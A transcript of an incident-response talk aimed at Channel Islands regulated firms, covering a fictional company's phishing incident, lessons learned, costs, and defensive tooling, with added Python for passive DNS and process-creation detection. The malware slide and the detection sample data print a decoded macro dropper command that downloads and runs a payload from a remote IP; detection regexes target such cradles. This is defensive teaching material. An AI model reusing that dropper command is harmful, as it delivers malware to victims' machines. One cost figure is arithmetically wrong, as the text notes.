Up your Game: Incident Response in the wake of Dear CEO
TRANSCRIPT
Who am I
• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP)
• Channel Islands Information Security Forum (CIISF) founder
• Secretary, British Computer Society Jersey
• My role is a mixture of offence and defence for clients of all sizes and verticals, including forensic malware investigations.
How we got here
“We expect that registered persons will take appropriate steps to properly manage their cyber-security arrangements.”
The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber-security risks. A registered person should:
• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in the event of a cyber-attack
• Review these matters and test their effectiveness
5 Key Questions – Incident Response
[1] Can we determine how many hosts talked to the bad domain, and when? How far back in time can we go to check or prove this?
[2] What information do we have available to us? Logs? Endpoint protection system?
[3] Did any of the affected hosts communicate with other systems on the network? If they did, what occurred?
[4] How long did it take us to detect and remedy the incident?
[5] What was the cost to the business?
Incident Response Stages
• Preparation
• Incident
• Identification
• Eradication
• Recovery
• Lessons Learned
Without information, you cannot respond!!
The more information that you have, the better your response.
Effective incident response is about being able to pivot quickly and direct your response accordingly.
Meet Calculon Inc.
Sites by region (number of staff), with time offset from the Channel Islands:
• Jersey = 180, Guernsey = 100, London = 20 (300 in total)
• Cayman = 50, BVI = 50 (100 in total; time = -5 hours)
• HK = 40, Kuala Lumpur = 30, Shanghai = 20 (90 in total; time = +8 hours)
Preparation – Threat Model
Threat | Vulnerability | Impact | Business Impact | Controls
Email phishing | Social engineering | Possible compromise | System rebuild | Logging, Anti-Virus
Malvertising attack | Outdated Adobe Flash | Possible compromise | System rebuild | Ad blocker, Anti-Virus
Web attack against culculon.com | Vulnerability in web application stack | Website compromised | Reputational loss | Keep website stack up to date
DDoS against culculon.com | Insufficient bandwidth | Website not available | Minor reputational loss | Consider DDoS protection
Preparation – Cyber Kill Chain
“You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You can't plan for that. That’s life.”
Timeline of the incident (days 1 to 7, November 2016):
• 11 Nov 2016 – Phishing email received
• 11 Nov 2016 – Identify infected systems
• 11 Nov 2016 – Disconnect infected systems from network
• 11 Nov 2016 – Delete Citrix user profiles
• 11 Nov 2016 – Delete email from Exchange server
• 11 Nov 2016 – Inform BVI/Cayman of the attack
• 11 Nov 2016 – System cleanup started
• 11 Nov 2016 to 14 Nov 2016 – Rebuild infected systems
• 14 Nov 2016 – Systems cleanup completed
• 14 Nov 2016 to 16 Nov 2016 – Reporting
• 17 Nov 2016 – Cost of incident
Incident – Malware Attack
A VBA macro virus with a hidden URL: the code is hidden in an Excel spreadsheet. When decoded it becomes…

    cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

The macro launches cmd.exe, which runs PowerShell to fetch a payload from a URL ending in .jpg and save it into %TEMP% as a .cab file, unpacks it with the Windows expand utility into an .exe, and starts that executable.
Incident – Lessons Learned
[1] Insufficient logging available
[2] “Triage” took too long
[3] Lack of support skills in locations outside the UK
[4] Volatile forensic data lost
[5] USB / DLP / drive encryption made analysis difficult
[6] AV showed no infection / incident response tools showed no malicious processes
[7] Reporting took too long
Incident 1 – Business Cost
25 users clicked the phishing email (12 of them Citrix users), in various locations: Jersey, Guernsey and London, plus a Calculon partner in KL and a Calculon senior executive in HK.
• 12 x Citrix users – £150 per hour – 6 hours = £3,600
• 9 x Citrix users – £200 per hour – 10 hours = £18,000
• 4 x Citrix users – £400 per hour – 5 hours = £8,000
• IT support costs = £2,000
• Total cost = £31,600
(The first line does not add up as shown: 12 x £150 x 6 hours is £10,800, and £3,600 corresponds to 2 hours. The total of £31,600 uses the £3,600 figure.)
Improving Our Response – Passive DNS
https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/
[1] Cheap to set up
[2] Use ‘Bro’ (now Zeek) with Critical Stack Intel
https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1
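As an added example (not code from the talk or from the linked posts), the following Python builds a small passive DNS index from Bro/Zeek dns.log-style records and answers Question 1 directly: which hosts resolved a bad domain, how many times, when, and how far back the store can prove anything. The column subset, hosts, domains, addresses and the intel list are all constructed; the intel layout assumes the tab-separated indicator/type form Bro intel feeds use.

```python
"""Passive DNS lookups over Bro/Zeek dns.log records (added example)."""
import datetime as dt
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: a tab-separated subset of Zeek dns.log columns
# (ts, id.orig_h, query, answers). Real logs carry many more columns;
# '-' is Zeek's empty field. Hosts, names and addresses are made up.
SAMPLE_DNS_LOG = """\
#fields\tts\tid.orig_h\tquery\tanswers
1478865601.120\t10.1.20.15\tmail.example.test\t192.0.2.10
1478865633.540\t10.1.20.15\tupdate.badhost.test\t198.51.100.7
1478865640.002\t10.1.20.22\tupdate.badhost.test\t198.51.100.7
1478866100.777\t10.1.30.40\tcdn.example.test\t192.0.2.44,192.0.2.45
1478952001.300\t10.1.20.22\tUPDATE.BADHOST.TEST.\t198.51.100.9
1478952055.118\t10.1.40.9\tupdate.badhost.test\t-
"""

# Constructed intel list in the indicator/type layout of Bro intel feeds.
SAMPLE_INTEL = """\
#fields\tindicator\tindicator_type
update.badhost.test\tIntel::DOMAIN
198.51.100.9\tIntel::ADDR
"""


@dataclass(frozen=True)
class DnsRecord:
    ts: float        # epoch seconds, as Zeek writes them
    client: str      # id.orig_h: the host that asked
    query: str       # normalised: lower-case, no trailing dot
    answers: tuple   # resolved addresses; empty when Zeek logged '-'


def normalise_name(name: str) -> str:
    """Case-fold and drop the trailing dot so lookups match what clients sent."""
    return name.strip().lower().rstrip(".")


def utc(ts: float) -> str:
    return dt.datetime.fromtimestamp(ts, dt.timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_dns_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, client, query, answers = line.split("\t")
        addrs = () if answers == "-" else tuple(answers.split(","))
        records.append(DnsRecord(float(ts), client, normalise_name(query), addrs))
    return records


def load_intel(text: str) -> dict:
    """Return {'domains': set, 'addrs': set} from an indicator/type list."""
    intel = {"domains": set(), "addrs": set()}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        indicator, kind = line.split("\t")[:2]
        if kind == "Intel::DOMAIN":
            intel["domains"].add(normalise_name(indicator))
        elif kind == "Intel::ADDR":
            intel["addrs"].add(indicator)
    return intel


class PassiveDns:
    """Index of who resolved what, keyed by query name and by answer address."""

    def __init__(self, records):
        self.records = sorted(records, key=lambda r: r.ts)
        self.by_query = defaultdict(list)
        self.by_answer = defaultdict(list)
        for r in self.records:
            self.by_query[r.query].append(r)
            for a in r.answers:
                self.by_answer[a].append(r)

    def lookback(self):
        """Oldest and newest record: how far back the store can prove anything."""
        if not self.records:
            return None
        return utc(self.records[0].ts), utc(self.records[-1].ts)

    def who_resolved(self, domain: str) -> dict:
        """Question 1 for one domain: which hosts, how many lookups, first/last seen."""
        hits = self.by_query.get(normalise_name(domain), [])
        return {
            "domain": normalise_name(domain),
            "lookups": len(hits),
            "hosts": sorted({r.client for r in hits}),
            "first_seen": utc(hits[0].ts) if hits else None,
            "last_seen": utc(hits[-1].ts) if hits else None,
        }

    def intel_hits(self, intel: dict) -> dict:
        """Match the store against an intel list by queried name and by answer address."""
        hits = {}
        for d in intel["domains"]:
            if self.by_query.get(d):
                hits[d] = list(self.by_query[d])
        for a in intel["addrs"]:
            if self.by_answer.get(a):
                hits[a] = list(self.by_answer[a])
        return hits
```

Matching on answer addresses as well as names is what catches the host whose lookup went to a name you did not know about yet but resolved to a listed address; the lookback() result is the honest answer to the second half of Question 1, because a store only proves what it has retained.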
Endpoint Logging
[1] Level One
• User logon / logoff events
• User account creation, deletion and modification
[2] Level Two
• Process creation / termination on systems (record the parent process and the full command line, or the event is of little use for triage)
• Use of sensitive privileges
[3] Must Have
• Logs must be stored centrally – avoids anti-forensic clearing of logs on the host
• Available for historic querying and hunting of suspicious activity
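The dropper in the incident above produced no AV detection, but it did produce a process tree: EXCEL.EXE spawning cmd.exe, a PowerShell download cradle, and an executable launched from %TEMP%. As an added example (not code from the talk), the following Python runs three rules of that shape over Level Two process-creation records. It assumes the records are shipped centrally as one JSON object per line with Sysmon Event ID 1 field names (UtcTime, Computer, User, Image, ParentImage, CommandLine); the events are constructed, with the decoded dropper command from the incident as the cmd.exe command line.

```python
"""Process-creation triage for a macro dropper (added example)."""
import json
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download cradles commonly seen in macro droppers
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|\biwr\b|bitsadmin", re.I)
# Executable content written to, or run from, a per-user temp directory
TEMP_EXEC_RE = re.compile(
    r"(%temp%|\\appdata\\local\\temp\\)[^\s'\"]*\.(exe|dll|scr|cab)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

# Constructed sample (one JSON object per line). JSY-CTX01 is the Citrix host
# where the spreadsheet was opened, GSY-WS07 runs a benign scheduled script,
# LON-WS03 shows a second, unrelated Office-to-shell launch.
SAMPLE_EVENTS = r"""
{"UtcTime": "2016-11-11 09:14:02", "Computer": "JSY-CTX01", "User": "CALCULON\\jsmith", "Image": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE\" /dde"}
{"UtcTime": "2016-11-11 09:14:05", "Computer": "JSY-CTX01", "User": "CALCULON\\jsmith", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE", "CommandLine": "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\\JIOiodfhioIH.cab'); expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; start %TEMP%\\JIOiodfhioIH.exe;"}
{"UtcTime": "2016-11-11 09:14:06", "Computer": "JSY-CTX01", "User": "CALCULON\\jsmith", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\\JIOiodfhioIH.cab')"}
{"UtcTime": "2016-11-11 09:14:09", "Computer": "JSY-CTX01", "User": "CALCULON\\jsmith", "Image": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\JIOiodfhioIH.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\JIOiodfhioIH.exe"}
{"UtcTime": "2016-11-11 09:20:00", "Computer": "GSY-WS07", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\taskeng.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"}
{"UtcTime": "2016-11-11 09:25:11", "Computer": "LON-WS03", "User": "CALCULON\\pjones", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "CommandLine": "cmd.exe /c whoami"}
"""


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    time: str
    user: str
    image: str
    parent: str
    command: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events) -> list:
    """Run the three rules over every event; one Alert per rule that fires."""
    alerts = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        fired = []
        # 1. Office application spawning a shell or script host
        if basename(ev["Image"]) in SHELLS and basename(ev["ParentImage"]) in OFFICE_APPS:
            fired.append("office-app-spawned-shell")
        # 2. Download cradle on the command line
        if DOWNLOAD_RE.search(cmd):
            fired.append("download-cradle")
        # 3. Executable content staged in, or launched from, a temp directory
        if TEMP_EXEC_RE.search(cmd) or TEMP_EXEC_RE.search(ev["Image"]):
            fired.append("exec-from-temp")
        for rule in fired:
            alerts.append(Alert(rule, ev["Computer"], ev["UtcTime"], ev["User"],
                                ev["Image"], ev["ParentImage"], cmd))
    return alerts


def affected_hosts(alerts) -> list:
    """The hosts to contain, and the starting point for Question 3."""
    return sorted({a.host for a in alerts})


def extract_urls(alerts) -> list:
    """URLs from alerting command lines, to pivot into passive DNS or proxy logs."""
    return sorted({u for a in alerts for u in URL_RE.findall(a.command)})


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f"{a.time} {a.host:10} {a.rule:25} {basename(a.parent)} -> {basename(a.image)}")
    print("hosts:", affected_hosts(found))
    print("urls:", extract_urls(found))
```

Rule 1 depends entirely on the parent image being logged, and rules 2 and 3 on the full command line; Windows 4688 without command-line auditing records neither, which is why the Level Two bullet above asks for both. The benign scheduled PowerShell script on GSY-WS07 raises nothing, and the URL pulled from the cradle is the pivot into the passive DNS store.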
Endpoint Forensics
[1] Directly examine the memory
• Far harder for malware to tamper with than asking the live OS about itself through its own APIs.
• More information available – much harder for malware to hide.
[2] Scalability
• We need to be able to ask questions of systems remotely.
• Allows us to pivot and focus on what needs to “get done” in an incident.
[3] Memory Samples
• Contain information that is not available from disk artefacts alone.
• Existing “Live IR” tools are insufficient.
Threat Hunting = Endpoint Logging + Forensics + Netflow
ELK Stack Explained
ELK Demo
Google Rapid Response (GRR)
• Cross-platform support for Linux, Mac OS X and Windows clients.
• Live remote memory analysis and imaging.
• Powerful search and download capabilities for files and the Windows registry.
• Secure communication infrastructure designed for Internet deployment.
• Detailed monitoring of client CPU, memory and IO usage, with self-imposed limits.
https://github.com/google/grr
Reporting / Compliance – FIR (Fast Incident Response)
https://github.com/certsocietegenerale/FIR
• Python / Django web application
• Open sourced by the Société Générale Incident Response Team
• Customisable and freely available for you to record your incidents in
• GPL v3 licensed – you can make changes for your own use
Canaries, Tokens and Honey Hashes
• Canary Token: something you place on your network (a document, a URL, a DNS name) that nobody has a legitimate reason to touch; if it is opened, you get an email alert.
• Canary Device: a honeypot appliance with an Internet-hosted console that mimics some other device (a file server, a switch, a database) and raises an alert when anything connects to it.
• Honey Hash: a fake credential (user name and NTLM hash) seeded into memory on critical servers so that any attempt to use it reveals a Pass-the-Hash or credential-theft attack.
Integrating SIEM into your response
• Endpoint logging and forensics integrated via event collectors
• Threat intelligence feeds directly integrated into the SIEM
• AV / next-gen AV supported
• Passive DNS integrated
Bridging the skills gap
• Forensic images: http://www.forensicfocus.com/images-and-challenges
• Volatility Framework: http://volatility-labs.blogspot.com/
• Incident Response: NIST SP 800-61r2, http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Questions
• Can your organisation prevent, detect and respond to the cyber-security threats that you face?
• In an incident, could you answer the five key questions?
@cyberkryption